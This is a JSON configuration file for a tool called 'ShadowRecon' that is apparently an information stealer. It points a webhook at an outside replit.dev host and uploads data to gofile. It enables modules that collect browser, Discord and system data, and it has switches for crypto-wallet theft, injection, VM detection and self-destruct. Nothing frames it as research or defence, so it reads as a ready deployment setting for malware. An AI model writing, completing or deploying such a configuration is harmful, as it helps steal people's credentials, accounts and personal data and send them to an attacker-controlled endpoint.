{
  "app": {
    "name": "ShadowRecon",
    "version": "3.0.0",
    "environment": "development"
  },
  "webhook": {
    "url": "http://b5c9f2f3-4577-41d0-b761-85937516f603-00-36saotrhgjkz4.kirk.replit.dev:3000",
    "timeout": 30000
  },
  "paths": {
    "temp": "/tmp",
    "output": "./output"
  },
  "upload": {
    "enabled": true,
    "service": "gofile",
    "maxSize": 7340032
  },
  "security": {
    "enableVmDetection": false,
    "enableSelfDestruct": false
  },
  "modules": {
    "enabled": {
      "browsers": true,
      "crypto": false,
      "files": false,
      "discord": true,
      "system": true,
      "injection": false
    }
  }
}